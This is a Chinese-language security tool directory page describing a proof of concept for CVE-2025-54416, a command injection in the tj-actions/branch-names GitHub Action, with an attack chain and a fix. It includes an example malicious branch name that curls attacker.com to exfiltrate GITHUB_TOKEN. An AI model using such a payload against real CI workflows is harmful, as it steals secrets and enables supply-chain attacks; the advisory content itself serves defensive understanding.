Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
atlas-tj-actions-poc — CVE-2025-54416 tj-actions/branch-names 命令注入的 PoC | Kitploit
工具/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
漏洞分析漏洞利用数据泄露命令与控制供应链安全学习与教育
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

CVE-2025-54416 tj-actions/branch-names 命令注入的 PoC

查看仓库
24个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-54416: tj-actions/branch-names 命令注入 PoC

该仓库演示了 CVE-2025-54416,这是 tj-actions/branch-names 中的一个严重命令注入漏洞,影响超过 5000 个公共仓库。

漏洞

tj-actions/branch-names GitHub Action(版本 <= 8.2.1)使用了不安全的 eval printf "%s",这在实际清理后重新引入了命令注入风险。

root@kitploit:~
# tj-actions/branch-names 中的漏洞代码模式:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

攻击链

  1. 攻击者创建一个包含恶意命令的分支名称
  2. 受害者工作流使用 tj-actions/[email protected] 提取分支名称
  3. 提取的分支名称(含攻击者载荷)被用于后续的 shell 命令
  4. 命令在 CI 运行器上下文中以运行器权限执行
  5. 机密(AWS 密钥、GITHUB_TOKEN 等)被窃取

示例载荷

分支名称:main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

当工作流运行时:

root@kitploit:~
echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
# 实际输出:IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
# $(...) 被 shell 评估,导致 GITHUB_TOKEN 泄露

影响

  • 窃取敏感机密(AWS 密钥、API 令牌、GITHUB_TOKEN)
  • 未经授权的代码修改
  • 向生产容器镜像仓库推送恶意镜像
  • 通过受损的 CI/CD 进行供应链攻击

修复

更新到 tj-actions/branch-names@v9 或更高版本,该版本将 eval printf "%s" 替换为安全的 printf 调用。

参考

  • GitHub 公告 GHSA-gq52-6phf-x2r6
  • CVE-2025-54416
下载工具